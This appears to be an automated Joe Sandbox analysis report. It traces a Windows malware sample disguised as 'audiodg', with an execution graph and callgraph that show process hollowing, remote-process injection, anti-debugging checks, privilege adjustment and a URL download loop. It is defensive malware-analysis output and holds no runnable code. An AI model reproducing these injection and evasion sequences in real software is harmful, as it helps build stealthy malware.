                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843939
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC84394C
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843961
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC844530: CreateFileW.KERNEL32 ref: 00007FF6EC844577
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC8410D8: OpenProcess.KERNEL32 ref: 00007FF6EC8410FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF6EC842FD3
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF6EC842FE6
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                        • Opcode ID: cb198f8349b0474e8430296de8ad644e8f73609a5c45828ea2168c8d2c9a5573
                                                                                                                                                                                                                        • Instruction ID: 4987e145f1766705d8bece20311e6f6b94b9511200c9eeb612cbac010d1eb791
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb198f8349b0474e8430296de8ad644e8f73609a5c45828ea2168c8d2c9a5573
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B111832A18B8281E750EB10FA483AB7BA8FF84744F400535D54CC2669DF3EE446CB4A

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:23.7%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:475
                                                                                                                                                                                                                        Total number of Limit Nodes:4
                                                                                                                                                                                                                        execution_graph 1430 7ff7ee06216c 1431 7ff7ee062196 InternetOpenW 1430->1431 1432 7ff7ee0621c3 Sleep 1431->1432 1433 7ff7ee0621d0 InternetOpenUrlW 1431->1433 1432->1431 1434 7ff7ee062207 InternetOpenUrlW 1433->1434 1435 7ff7ee062259 HttpQueryInfoA 1433->1435 1434->1435 1436 7ff7ee06223e InternetCloseHandle Sleep 1434->1436 1437 7ff7ee0622ae 1435->1437 1438 7ff7ee062288 InternetCloseHandle InternetCloseHandle Sleep 1435->1438 1436->1431 1439 7ff7ee0622b8 InternetCloseHandle InternetOpenUrlW 1437->1439 1440 7ff7ee062315 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1437->1440 1438->1431 1439->1440 1441 7ff7ee0622fa InternetCloseHandle Sleep 1439->1441 1442 7ff7ee06237a InternetCloseHandle InternetCloseHandle 1440->1442 1443 7ff7ee062394 1440->1443 1441->1431 1444 7ff7ee062413 1442->1444 1445 7ff7ee06239c InternetReadFile 1443->1445 1446 7ff7ee0623ea InternetCloseHandle InternetCloseHandle 1443->1446 1445->1443 1445->1446 1446->1444 1366 7ff7ee062ea8 CreateMutexA 1367 7ff7ee062ecd ReleaseMutex CloseHandle 1366->1367 1368 7ff7ee062eea GetLastError 1366->1368 1369 7ff7ee062f2c 1367->1369 1370 7ff7ee062ef7 ReleaseMutex CloseHandle 1368->1370 1371 7ff7ee062f14 ReleaseMutex CloseHandle 1368->1371 1370->1369 1371->1369 1372 7ff7ee063348 1375 7ff7ee0624d8 GetModuleFileNameW 1372->1375 1376 7ff7ee062559 1375->1376 1384 7ff7ee062554 1375->1384 1377 7ff7ee0625ad 1376->1377 1378 7ff7ee062597 1376->1378 1418 7ff7ee062418 ExpandEnvironmentStringsW 1377->1418 1379 7ff7ee0625cb 1378->1379 1380 7ff7ee0625a1 1378->1380 1419 7ff7ee062458 ExpandEnvironmentStringsW 1379->1419 1380->1384 1420 7ff7ee062498 ExpandEnvironmentStringsW 1380->1420 1385 7ff7ee0625c2 1385->1384 1386 7ff7ee06261d CreateProcessW 1385->1386 1386->1384 1387 7ff7ee062678 1386->1387 1387->1384 1388 7ff7ee0626bf GetFileSize 1387->1388 1389 7ff7ee0626dd 1388->1389 1390 7ff7ee0626e7 CloseHandle 1388->1390 1389->1390 1391 7ff7ee0626f7 VirtualAlloc 1389->1391 1390->1384 1392 7ff7ee062731 ReadFile 1391->1392 1393 7ff7ee062721 CloseHandle 1391->1393 1394 7ff7ee06275e VirtualFree CloseHandle 1392->1394 1395 7ff7ee062781 CloseHandle GetThreadContext 1392->1395 1393->1384 1394->1384 1396 7ff7ee0627e9 ReadProcessMemory GetModuleHandleA GetProcAddress 1395->1396 1397 7ff7ee0627d1 VirtualFree 1395->1397 1398 7ff7ee06286c 1396->1398 1397->1384 1399 7ff7ee062888 VirtualAllocEx 1398->1399 1400 7ff7ee062870 VirtualFree 1398->1400 1401 7ff7ee06290b WriteProcessMemory 1399->1401 1402 7ff7ee0628f3 VirtualFree 1399->1402 1400->1384 1403 7ff7ee062941 VirtualFree 1401->1403 1406 7ff7ee062959 1401->1406 1402->1384 1403->1384 1404 7ff7ee06298f WriteProcessMemory 1405 7ff7ee062a1a VirtualFree 1404->1405 1404->1406 1405->1384 1406->1404 1411 7ff7ee062a37 1406->1411 1407 7ff7ee062d28 WriteProcessMemory SetThreadContext 1409 7ff7ee062dae VirtualFree 1407->1409 1410 7ff7ee062dc3 ResumeThread 1407->1410 1408 7ff7ee062aa9 RtlCompareMemory 1408->1411 1415 7ff7ee062afc 1408->1415 1409->1384 1412 7ff7ee062dea VirtualFree 1410->1412 1413 7ff7ee062dd5 VirtualFree 1410->1413 1411->1407 1411->1408 1412->1384 1413->1384 1414 7ff7ee062d23 1414->1407 1415->1414 1416 7ff7ee062c2c ReadProcessMemory WriteProcessMemory 1415->1416 1416->1415 1417 7ff7ee062d01 VirtualFree 1416->1417 1417->1384 1418->1385 1419->1385 1420->1385 1447 7ff7ee063368 1448 7ff7ee0624d8 35 API calls 1447->1448 1449 7ff7ee06337b 1448->1449 1450 7ff7ee061088 GetModuleHandleA GetProcAddress 1451 7ff7ee0610bb 1450->1451 1452 7ff7ee063188 1453 7ff7ee063191 1452->1453 1454 7ff7ee0631aa 1453->1454 1457 7ff7ee063008 1453->1457 1462 7ff7ee062e08 CreateMutexA 1457->1462 1460 7ff7ee063068 Sleep 1460->1453 1461 7ff7ee063023 Sleep CreateThread WaitForSingleObject 1461->1460 1463 7ff7ee062e34 ReleaseMutex CloseHandle 1462->1463 1464 7ff7ee062e51 GetLastError 1462->1464 1465 7ff7ee062e93 1463->1465 1466 7ff7ee062e7b ReleaseMutex CloseHandle 1464->1466 1467 7ff7ee062e5e ReleaseMutex CloseHandle 1464->1467 1465->1460 1465->1461 1466->1465 1467->1465 847 7ff7ee063418 907 7ff7ee06153c 847->907 852 7ff7ee063438 1141 7ff7ee0640b0 GetCurrentProcess OpenProcessToken 852->1141 853 7ff7ee063430 ExitProcess 857 7ff7ee063453 858 7ff7ee063468 857->858 859 7ff7ee0634b7 857->859 860 7ff7ee0641f0 3 API calls 858->860 862 7ff7ee0634cc 859->862 863 7ff7ee063508 859->863 861 7ff7ee063474 860->861 864 7ff7ee06347b 861->864 865 7ff7ee06348e ExitProcess 861->865 1156 7ff7ee0641f0 CreateMutexExA 862->1156 870 7ff7ee06355e 863->870 871 7ff7ee06351d 863->871 867 7ff7ee0641f0 3 API calls 864->867 869 7ff7ee063487 867->869 869->865 874 7ff7ee063496 869->874 1174 7ff7ee063a40 870->1174 875 7ff7ee0641f0 3 API calls 871->875 872 7ff7ee0634e7 1169 7ff7ee063218 872->1169 873 7ff7ee0634df ExitProcess 1160 7ff7ee0632a8 874->1160 880 7ff7ee063529 875->880 879 7ff7ee06349b 883 7ff7ee0634af ExitProcess 879->883 884 7ff7ee0634a2 Sleep 879->884 885 7ff7ee063538 880->885 886 7ff7ee063530 ExitProcess 880->886 881 7ff7ee0634ec 887 7ff7ee0634f3 Sleep 881->887 888 7ff7ee063500 ExitProcess 881->888 882 7ff7ee063563 1180 7ff7ee0633a8 GetVersionExW 882->1180 884->879 890 7ff7ee063218 19 API calls 885->890 887->881 894 7ff7ee06353d 890->894 892 7ff7ee0635ca CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 893 7ff7ee063576 895 7ff7ee0641f0 3 API calls 893->895 896 7ff7ee063544 Sleep 894->896 897 7ff7ee063551 ExitProcess 894->897 898 7ff7ee063582 895->898 896->894 899 7ff7ee06359c ExitProcess 898->899 900 7ff7ee0641f0 3 API calls 898->900 901 7ff7ee063595 900->901 901->899 902 7ff7ee0635a4 901->902 903 7ff7ee0632a8 42 API calls 902->903 904 7ff7ee0635a9 903->904 905 7ff7ee0635bd ExitProcess 904->905 906 7ff7ee0635b0 Sleep 904->906 906->904 1182 7ff7ee06149c LoadLibraryA GetProcAddress 907->1182 909 7ff7ee0615c8 1183 7ff7ee06149c LoadLibraryA GetProcAddress 909->1183 911 7ff7ee0615e2 1184 7ff7ee0614ec LoadLibraryA GetProcAddress 911->1184 913 7ff7ee0615fc 1185 7ff7ee0614ec LoadLibraryA GetProcAddress 913->1185 915 7ff7ee061616 1186 7ff7ee0614ec LoadLibraryA GetProcAddress 915->1186 917 7ff7ee061630 1187 7ff7ee0614ec LoadLibraryA GetProcAddress 917->1187 919 7ff7ee06164a 1188 7ff7ee0614ec LoadLibraryA GetProcAddress 919->1188 921 7ff7ee061664 1189 7ff7ee0614ec LoadLibraryA GetProcAddress 921->1189 923 7ff7ee06167e 1190 7ff7ee0614ec LoadLibraryA GetProcAddress 923->1190 925 7ff7ee061698 1191 7ff7ee0614ec LoadLibraryA GetProcAddress 925->1191 927 7ff7ee0616b2 1192 7ff7ee0614ec LoadLibraryA GetProcAddress 927->1192 929 7ff7ee0616cc 1193 7ff7ee06149c LoadLibraryA GetProcAddress 929->1193 931 7ff7ee0616e6 1194 7ff7ee06149c LoadLibraryA GetProcAddress 931->1194 933 7ff7ee061700 1195 7ff7ee06149c LoadLibraryA GetProcAddress 933->1195 935 7ff7ee06171a 1196 7ff7ee06149c LoadLibraryA GetProcAddress 935->1196 937 7ff7ee061734 1197 7ff7ee0614ec LoadLibraryA GetProcAddress 937->1197 939 7ff7ee06174e 1198 7ff7ee0614ec LoadLibraryA GetProcAddress 939->1198 941 7ff7ee061768 1199 7ff7ee0614ec LoadLibraryA GetProcAddress 941->1199 943 7ff7ee061782 1200 7ff7ee0614ec LoadLibraryA GetProcAddress 943->1200 945 7ff7ee06179c 1201 7ff7ee0614ec LoadLibraryA GetProcAddress 945->1201 947 7ff7ee0617b6 1202 7ff7ee0614ec LoadLibraryA GetProcAddress 947->1202 949 7ff7ee0617d0 1203 7ff7ee0614ec LoadLibraryA GetProcAddress 949->1203 951 7ff7ee0617ea 1204 7ff7ee0614ec LoadLibraryA GetProcAddress 951->1204 953 7ff7ee061804 1205 7ff7ee0614ec LoadLibraryA GetProcAddress 953->1205 955 7ff7ee06181e 1206 7ff7ee0614ec LoadLibraryA GetProcAddress 955->1206 957 7ff7ee061838 1207 7ff7ee0614ec LoadLibraryA GetProcAddress 957->1207 959 7ff7ee061852 1208 7ff7ee0614ec LoadLibraryA GetProcAddress 959->1208 961 7ff7ee06186c 1209 7ff7ee0614ec LoadLibraryA GetProcAddress 961->1209 963 7ff7ee061886 1210 7ff7ee0614ec LoadLibraryA GetProcAddress 963->1210 965 7ff7ee0618a0 1211 7ff7ee0614ec LoadLibraryA GetProcAddress 965->1211 967 7ff7ee0618ba 1212 7ff7ee0614ec LoadLibraryA GetProcAddress 967->1212 969 7ff7ee0618d4 1213 7ff7ee0614ec LoadLibraryA GetProcAddress 969->1213 971 7ff7ee0618ee 1214 7ff7ee0614ec LoadLibraryA GetProcAddress 971->1214 973 7ff7ee061908 1215 7ff7ee0614ec LoadLibraryA GetProcAddress 973->1215 975 7ff7ee061922 1216 7ff7ee0614ec LoadLibraryA GetProcAddress 975->1216 977 7ff7ee06193c 1217 7ff7ee0614ec LoadLibraryA GetProcAddress 977->1217 979 7ff7ee061956 1218 7ff7ee0614ec LoadLibraryA GetProcAddress 979->1218 981 7ff7ee061970 1219 7ff7ee0614ec LoadLibraryA GetProcAddress 981->1219 983 7ff7ee06198a 1220 7ff7ee0614ec LoadLibraryA GetProcAddress 983->1220 985 7ff7ee0619a4 1221 7ff7ee0614ec LoadLibraryA GetProcAddress 985->1221 987 7ff7ee0619be 1222 7ff7ee0614ec LoadLibraryA GetProcAddress 987->1222 989 7ff7ee0619d8 1223 7ff7ee0614ec LoadLibraryA GetProcAddress 989->1223 991 7ff7ee0619f2 1224 7ff7ee0614ec LoadLibraryA GetProcAddress 991->1224 993 7ff7ee061a0c 1225 7ff7ee0614ec LoadLibraryA GetProcAddress 993->1225 995 7ff7ee061a26 1226 7ff7ee0614ec LoadLibraryA GetProcAddress 995->1226 997 7ff7ee061a40 1227 7ff7ee0614ec LoadLibraryA GetProcAddress 997->1227 999 7ff7ee061a5a 1228 7ff7ee0614ec LoadLibraryA GetProcAddress 999->1228 1001 7ff7ee061a74 1229 7ff7ee0614ec LoadLibraryA GetProcAddress 1001->1229 1003 7ff7ee061a8e 1230 7ff7ee0614ec LoadLibraryA GetProcAddress 1003->1230 1005 7ff7ee061aa8 1231 7ff7ee0614ec LoadLibraryA GetProcAddress 1005->1231 1007 7ff7ee061ac2 1232 7ff7ee0614ec LoadLibraryA GetProcAddress 1007->1232 1009 7ff7ee061adc 1233 7ff7ee0614ec LoadLibraryA GetProcAddress 1009->1233 1011 7ff7ee061af6 1234 7ff7ee0614ec LoadLibraryA GetProcAddress 1011->1234 1013 7ff7ee061b10 1235 7ff7ee0614ec LoadLibraryA GetProcAddress 1013->1235 1015 7ff7ee061b2a 1236 7ff7ee0614ec LoadLibraryA GetProcAddress 1015->1236 1017 7ff7ee061b44 1237 7ff7ee0614ec LoadLibraryA GetProcAddress 1017->1237 1019 7ff7ee061b5e 1238 7ff7ee0614ec LoadLibraryA GetProcAddress 1019->1238 1021 7ff7ee061b78 1239 7ff7ee0614ec LoadLibraryA GetProcAddress 1021->1239 1023 7ff7ee061b92 1240 7ff7ee0614ec LoadLibraryA GetProcAddress 1023->1240 1025 7ff7ee061bac 1241 7ff7ee0614ec LoadLibraryA GetProcAddress 1025->1241 1027 7ff7ee061bc6 1242 7ff7ee0614ec LoadLibraryA GetProcAddress 1027->1242 1029 7ff7ee061be0 1243 7ff7ee0614ec LoadLibraryA GetProcAddress 1029->1243 1031 7ff7ee061bfa 1244 7ff7ee0614ec LoadLibraryA GetProcAddress 1031->1244 1033 7ff7ee061c14 1245 7ff7ee0614ec LoadLibraryA GetProcAddress 1033->1245 1035 7ff7ee061c2e 1246 7ff7ee0614ec LoadLibraryA GetProcAddress 1035->1246 1037 7ff7ee061c48 1247 7ff7ee0614ec LoadLibraryA GetProcAddress 1037->1247 1039 7ff7ee061c62 1248 7ff7ee0614ec LoadLibraryA GetProcAddress 1039->1248 1041 7ff7ee061c7c 1249 7ff7ee0614ec LoadLibraryA GetProcAddress 1041->1249 1043 7ff7ee061c96 1250 7ff7ee0614ec LoadLibraryA GetProcAddress 1043->1250 1045 7ff7ee061cb0 1251 7ff7ee0614ec LoadLibraryA GetProcAddress 1045->1251 1047 7ff7ee061cca 1252 7ff7ee0614ec LoadLibraryA GetProcAddress 1047->1252 1049 7ff7ee061ce4 1253 7ff7ee0614ec LoadLibraryA GetProcAddress 1049->1253 1051 7ff7ee061cfe 1254 7ff7ee0614ec LoadLibraryA GetProcAddress 1051->1254 1053 7ff7ee061d18 1255 7ff7ee0614ec LoadLibraryA GetProcAddress 1053->1255 1055 7ff7ee061d32 1256 7ff7ee0614ec LoadLibraryA GetProcAddress 1055->1256 1057 7ff7ee061d4c 1257 7ff7ee0614ec LoadLibraryA GetProcAddress 1057->1257 1059 7ff7ee061d66 1258 7ff7ee0614ec LoadLibraryA GetProcAddress 1059->1258 1061 7ff7ee061d80 1259 7ff7ee0614ec LoadLibraryA GetProcAddress 1061->1259 1063 7ff7ee061d9a 1260 7ff7ee0614ec LoadLibraryA GetProcAddress 1063->1260 1065 7ff7ee061db4 1261 7ff7ee0614ec LoadLibraryA GetProcAddress 1065->1261 1067 7ff7ee061dce 1262 7ff7ee0614ec LoadLibraryA GetProcAddress 1067->1262 1069 7ff7ee061de8 1263 7ff7ee0614ec LoadLibraryA GetProcAddress 1069->1263 1071 7ff7ee061e02 1264 7ff7ee0614ec LoadLibraryA GetProcAddress 1071->1264 1073 7ff7ee061e1c 1265 7ff7ee0614ec LoadLibraryA GetProcAddress 1073->1265 1075 7ff7ee061e36 1266 7ff7ee0614ec LoadLibraryA GetProcAddress 1075->1266 1077 7ff7ee061e50 1267 7ff7ee0614ec LoadLibraryA GetProcAddress 1077->1267 1079 7ff7ee061e6a 1268 7ff7ee0614ec LoadLibraryA GetProcAddress 1079->1268 1081 7ff7ee061e84 1269 7ff7ee0614ec LoadLibraryA GetProcAddress 1081->1269 1083 7ff7ee061e9e 1270 7ff7ee0614ec LoadLibraryA GetProcAddress 1083->1270 1085 7ff7ee061eb8 1271 7ff7ee0614ec LoadLibraryA GetProcAddress 1085->1271 1087 7ff7ee061ed2 1272 7ff7ee0614ec LoadLibraryA GetProcAddress 1087->1272 1089 7ff7ee061eec 1273 7ff7ee0614ec LoadLibraryA GetProcAddress 1089->1273 1091 7ff7ee061f06 1274 7ff7ee0614ec LoadLibraryA GetProcAddress 1091->1274 1093 7ff7ee061f20 1275 7ff7ee0614ec LoadLibraryA GetProcAddress 1093->1275 1095 7ff7ee061f3a 1276 7ff7ee0614ec LoadLibraryA GetProcAddress 1095->1276 1097 7ff7ee061f54 1277 7ff7ee0614ec LoadLibraryA GetProcAddress 1097->1277 1099 7ff7ee061f6e 1278 7ff7ee0614ec LoadLibraryA GetProcAddress 1099->1278 1101 7ff7ee061f88 1279 7ff7ee0614ec LoadLibraryA GetProcAddress 1101->1279 1103 7ff7ee061fa2 1280 7ff7ee0614ec LoadLibraryA GetProcAddress 1103->1280 1105 7ff7ee061fbc 1281 7ff7ee06149c LoadLibraryA GetProcAddress 1105->1281 1107 7ff7ee061fd6 1282 7ff7ee0614ec LoadLibraryA GetProcAddress 1107->1282 1109 7ff7ee061ff0 1283 7ff7ee0614ec LoadLibraryA GetProcAddress 1109->1283 1111 7ff7ee06200a 1284 7ff7ee0614ec LoadLibraryA GetProcAddress 1111->1284 1113 7ff7ee062024 1285 7ff7ee0614ec LoadLibraryA GetProcAddress 1113->1285 1115 7ff7ee06203e 1286 7ff7ee0614ec LoadLibraryA GetProcAddress 1115->1286 1117 7ff7ee062058 1287 7ff7ee0614ec LoadLibraryA GetProcAddress 1117->1287 1119 7ff7ee062072 1288 7ff7ee0614ec LoadLibraryA GetProcAddress 1119->1288 1121 7ff7ee06208c 1289 7ff7ee06149c LoadLibraryA GetProcAddress 1121->1289 1123 7ff7ee0620a6 1290 7ff7ee06149c LoadLibraryA GetProcAddress 1123->1290 1125 7ff7ee0620c0 1291 7ff7ee0614ec LoadLibraryA GetProcAddress 1125->1291 1127 7ff7ee0620da 1292 7ff7ee0614ec LoadLibraryA GetProcAddress 1127->1292 1129 7ff7ee0620f4 1293 7ff7ee0614ec LoadLibraryA GetProcAddress 1129->1293 1131 7ff7ee06210e 1294 7ff7ee0614ec LoadLibraryA GetProcAddress 1131->1294 1133 7ff7ee062128 1295 7ff7ee0614ec LoadLibraryA GetProcAddress 1133->1295 1135 7ff7ee062142 1296 7ff7ee0614ec LoadLibraryA GetProcAddress 1135->1296 1137 7ff7ee06215c 1138 7ff7ee0631b8 IsDebuggerPresent 1137->1138 1139 7ff7ee0631ca GetCurrentProcess CheckRemoteDebuggerPresent 1138->1139 1140 7ff7ee0631c6 1138->1140 1139->1140 1140->852 1140->853 1142 7ff7ee0640d6 GetTokenInformation 1141->1142 1144 7ff7ee06343d 1141->1144 1297 7ff7ee063b20 VirtualAlloc 1142->1297 1152 7ff7ee063cb0 GetModuleFileNameW 1144->1152 1145 7ff7ee064107 GetTokenInformation 1146 7ff7ee06414e AdjustTokenPrivileges CloseHandle 1145->1146 1147 7ff7ee064134 CloseHandle 1145->1147 1298 7ff7ee063af0 1146->1298 1148 7ff7ee063af0 VirtualFree 1147->1148 1149 7ff7ee064149 1148->1149 1149->1144 1153 7ff7ee063cdb PathFindFileNameW wcslen 1152->1153 1154 7ff7ee063d9e wcsncpy 1152->1154 1155 7ff7ee063d15 1153->1155 1154->1155 1155->857 1157 7ff7ee06421c GetLastError 1156->1157 1158 7ff7ee0634d8 1156->1158 1157->1158 1159 7ff7ee064229 CloseHandle 1157->1159 1158->872 1158->873 1159->1158 1301 7ff7ee063890 1160->1301 1162 7ff7ee0632b9 1305 7ff7ee064530 1162->1305 1164 7ff7ee0632d1 1165 7ff7ee063313 CreateThread 1164->1165 1318 7ff7ee064090 1164->1318 1165->879 1170 7ff7ee063890 10 API calls 1169->1170 1171 7ff7ee063228 1170->1171 1353 7ff7ee064300 1171->1353 1175 7ff7ee063710 3 API calls 1174->1175 1176 7ff7ee063a6b 1175->1176 1177 7ff7ee063890 10 API calls 1176->1177 1178 7ff7ee063a75 GetModuleFileNameW 1177->1178 1179 7ff7ee063a96 1178->1179 1179->882 1181 7ff7ee0633d9 1180->1181 1181->892 1181->893 1182->909 1183->911 1184->913 1185->915 1186->917 1187->919 1188->921 1189->923 1190->925 1191->927 1192->929 1193->931 1194->933 1195->935 1196->937 1197->939 1198->941 1199->943 1200->945 1201->947 1202->949 1203->951 1204->953 1205->955 1206->957 1207->959 1208->961 1209->963 1210->965 1211->967 1212->969 1213->971 1214->973 1215->975 1216->977 1217->979 1218->981 1219->983 1220->985 1221->987 1222->989 1223->991 1224->993 1225->995 1226->997 1227->999 1228->1001 1229->1003 1230->1005 1231->1007 1232->1009 1233->1011 1234->1013 1235->1015 1236->1017 1237->1019 1238->1021 1239->1023 1240->1025 1241->1027 1242->1029 1243->1031 1244->1033 1245->1035 1246->1037 1247->1039 1248->1041 1249->1043 1250->1045 1251->1047 1252->1049 1253->1051 1254->1053 1255->1055 1256->1057 1257->1059 1258->1061 1259->1063 1260->1065 1261->1067 1262->1069 1263->1071 1264->1073 1265->1075 1266->1077 1267->1079 1268->1081 1269->1083 1270->1085 1271->1087 1272->1089 1273->1091 1274->1093 1275->1095 1276->1097 1277->1099 1278->1101 1279->1103 1280->1105 1281->1107 1282->1109 1283->1111 1284->1113 1285->1115 1286->1117 1287->1119 1288->1121 1289->1123 1290->1125 1291->1127 1292->1129 1293->1131 1294->1133 1295->1135 1296->1137 1297->1145 1299 7ff7ee063b14 1298->1299 1300 7ff7ee063b01 VirtualFree 1298->1300 1299->1144 1300->1299 1337 7ff7ee063710 GetWindowsDirectoryW 1301->1337 1303 7ff7ee0638bf SHGetFolderPathW lstrcatW lstrcatW CreateDirectoryW 1304 7ff7ee06392a lstrcatW lstrcatW lstrcatW 1303->1304 1304->1162 1306 7ff7ee06457d 1305->1306 1307 7ff7ee06458a 1306->1307 1308 7ff7ee064591 GetFileSize GetProcessHeap RtlAllocateHeap 1306->1308 1307->1164 1309 7ff7ee0645ec ReadFile 1308->1309 1310 7ff7ee0645da CloseHandle 1308->1310 1311 7ff7ee06463b 1309->1311 1312 7ff7ee064613 GetProcessHeap HeapFree CloseHandle 1309->1312 1310->1307 1313 7ff7ee064654 GetProcessHeap HeapFree CloseHandle 1311->1313 1315 7ff7ee06467c 1311->1315 1312->1307 1313->1307 1314 7ff7ee0647e7 GetProcessHeap HeapFree CloseHandle 1314->1307 1315->1314 1316 7ff7ee064737 GetProcessHeap RtlAllocateHeap 1315->1316 1317 7ff7ee064780 1316->1317 1317->1314 1342 7ff7ee063fd0 CreateToolhelp32Snapshot 1318->1342 1321 7ff7ee0610d8 OpenProcess 1322 7ff7ee061115 1321->1322 1323 7ff7ee06111f 1321->1323 1322->1165 1349 7ff7ee0613c4 GetModuleHandleA GetProcAddress 1323->1349 1325 7ff7ee06112c 1325->1322 1326 7ff7ee0611fe VirtualAllocEx 1325->1326 1326->1322 1327 7ff7ee06124f WriteProcessMemory 1326->1327 1327->1322 1328 7ff7ee061286 WriteProcessMemory 1327->1328 1328->1322 1329 7ff7ee0612d1 1328->1329 1351 7ff7ee061444 GetSystemInfo 1329->1351 1332 7ff7ee0612fe GetModuleHandleA GetProcAddress 1332->1322 1334 7ff7ee061338 1332->1334 1333 7ff7ee061444 GetSystemInfo 1335 7ff7ee0612f4 1333->1335 1334->1322 1336 7ff7ee061399 CloseHandle 1334->1336 1335->1332 1335->1336 1336->1322 1338 7ff7ee06375a 1337->1338 1339 7ff7ee063764 GetVolumeInformationW 1337->1339 1338->1339 1340 7ff7ee0637e0 1339->1340 1341 7ff7ee06384a wsprintfW 1340->1341 1341->1303 1343 7ff7ee06400b Process32FirstW 1342->1343 1344 7ff7ee0632fe 1342->1344 1345 7ff7ee06402a wcscmp 1343->1345 1346 7ff7ee064065 CloseHandle 1343->1346 1344->1321 1347 7ff7ee06404e Process32NextW 1345->1347 1348 7ff7ee064041 1345->1348 1346->1344 1347->1345 1347->1346 1348->1346 1350 7ff7ee0613ff 1349->1350 1350->1325 1352 7ff7ee0612ea 1351->1352 1352->1332 1352->1333 1354 7ff7ee064349 1353->1354 1355 7ff7ee064377 GetLastError 1354->1355 1356 7ff7ee064356 1354->1356 1358 7ff7ee06323b CreateThread Sleep CreateThread 1355->1358 1360 7ff7ee064250 GetFileSize 1356->1360 1358->881 1365 7ff7ee063b20 VirtualAlloc 1360->1365 1362 7ff7ee06427c 1363 7ff7ee0642c6 CloseHandle 1362->1363 1364 7ff7ee064290 SetFilePointer ReadFile 1362->1364 1363->1358 1364->1363 1365->1362 1421 7ff7ee062f38 1422 7ff7ee063890 10 API calls 1421->1422 1423 7ff7ee062f77 1422->1423 1424 7ff7ee064530 16 API calls 1423->1424 1425 7ff7ee062f9b 1424->1425 1426 7ff7ee064090 5 API calls 1425->1426 1427 7ff7ee062fbe 1426->1427 1428 7ff7ee0610d8 10 API calls 1427->1428 1429 7ff7ee062fd3 GetProcessHeap HeapFree 1428->1429 1471 7ff7ee063078 1475 7ff7ee063081 1471->1475 1472 7ff7ee06316d 1474 7ff7ee063bf0 RegDeleteKeyW 1474->1475 1475->1472 1475->1474 1476 7ff7ee063df0 9 API calls 1475->1476 1477 7ff7ee06315d Sleep 1475->1477 1478 7ff7ee064410 1475->1478 1476->1475 1477->1475 1479 7ff7ee06445e 1478->1479 1480 7ff7ee0644a6 1479->1480 1484 7ff7ee064390 SetFilePointer WriteFile SetEndOfFile 1479->1484 1480->1475 1482 7ff7ee064487 CloseHandle 1482->1480 1484->1482

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                                        callgraph 0 Function_00007FF7EE063C30 1 Function_00007FF7EE064530 76 Function_00007FF7EE0644C0 1->76 2 Function_00007FF7EE063418 3 Function_00007FF7EE063218 2->3 18 Function_00007FF7EE06153C 2->18 22 Function_00007FF7EE063A40 2->22 52 Function_00007FF7EE0633A8 2->52 53 Function_00007FF7EE0632A8 2->53 57 Function_00007FF7EE0640B0 2->57 58 Function_00007FF7EE063CB0 2->58 70 Function_00007FF7EE0631B8 2->70 82 Function_00007FF7EE0641F0 2->82 94 Function_00007FF7EE063EE0 2->94 42 Function_00007FF7EE063890 3->42 110 Function_00007FF7EE064300 3->110 4 Function_00007FF7EE062418 5 Function_00007FF7EE063B20 6 Function_00007FF7EE06EC20 7 Function_00007FF7EE06B04E 8 Function_00007FF7EE06F74B 9 Function_00007FF7EE063348 87 Function_00007FF7EE0624D8 9->87 10 Function_00007FF7EE06F749 11 Function_00007FF7EE06F747 12 Function_00007FF7EE06B248 13 Function_00007FF7EE064250 13->5 14 Function_00007FF7EE063B50 15 Function_00007FF7EE06B052 16 Function_00007FF7EE06B152 17 Function_00007FF7EE06C14F 60 Function_00007FF7EE06149C 18->60 78 Function_00007FF7EE0614EC 18->78 19 Function_00007FF7EE062F38 19->0 19->1 19->42 43 Function_00007FF7EE064090 19->43 86 Function_00007FF7EE0610D8 19->86 20 Function_00007FF7EE06DC37 21 Function_00007FF7EE061444 22->42 48 Function_00007FF7EE063980 